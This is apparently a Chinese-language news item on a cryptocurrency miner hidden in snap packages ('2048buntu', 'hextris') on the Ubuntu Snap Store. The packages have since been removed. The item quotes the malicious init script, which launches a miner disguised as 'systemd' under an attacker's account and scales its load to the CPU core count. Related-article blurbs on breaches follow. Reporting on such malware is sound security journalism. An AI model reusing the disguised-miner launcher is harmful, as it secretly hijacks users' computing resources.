Ubuntu软件中心的安装包也不安全,最近一些snap软件包中的恶意软件在Ubuntu Snaps Store被发现。
用户Nicolas Tomb上传至2048buntu和hextris的两个snap捕获包中包含恶意软件。被发现后,所有由Nicolas开发的软件包已经从Ubuntu Snaps Store中删除。
2048buntu snap程序包(以及Nicolas Tomb的其他程序包)包含一个隐藏的加密货币矿工。 下面的是init脚本:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
为什么会发生这种情况?
为了用户提供更易于安装的软件包。Ubuntu Snap Store允许任何人上传snap软件包,而不是官方Ubuntu软件库中的软件包(deb)。
标签:
安全
相关文章
有骇客声称盗取了涉及十亿中国公民资讯的警方数据
被公开的小部分数据样本中有的甚至可以追溯到 1995 年。
log4j安全漏洞导致iCloud等云服务器受影响
开源 Log4j 被发现名为 Log4Shell 漏洞,导致包括 Apple iCloud、Steam、Minecraft、Amazon、Twitter、Minecraft 等相关服务的密码数据都有外泄的可能。据The Verge的报导,日志框架 Log4j...
有人一直在入侵 Tor 服务器以对用户进行去匿名化
自 2017 年以来,一位被称为“KAX17”的神秘个人或组织在 Tor 网络的入口、中间和出口位置运行了数千台恶意服务器,试图对 Tor 用户进行去匿名化。